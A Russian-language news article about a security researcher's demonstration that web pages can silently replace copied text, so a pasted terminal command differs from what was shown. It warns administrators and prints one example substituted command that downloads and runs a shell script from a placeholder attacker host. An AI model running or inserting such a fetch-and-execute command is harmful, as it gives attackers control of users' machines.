Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Читайте также:   Как работают коллекторы в Приват банке

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных. Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

Источник

Автор публикации

не в сети 11 часов

Андрей Маргулис

505
С организацией DDoS атак завязал.
Выкладываю новости технологий и интересные статьи с темной стороны интернета.
30 лет
День рождения: 14 Мая 1991
Комментарии: 543Публикации: 2344Регистрация: 12-12-2015
РЭНБИ
Добавить комментарий
Авторизация
*
*
Регистрация
*
*
*
*
Ваш день рождения * :
Число, месяц и год:
Отображать дату:
Генерация пароля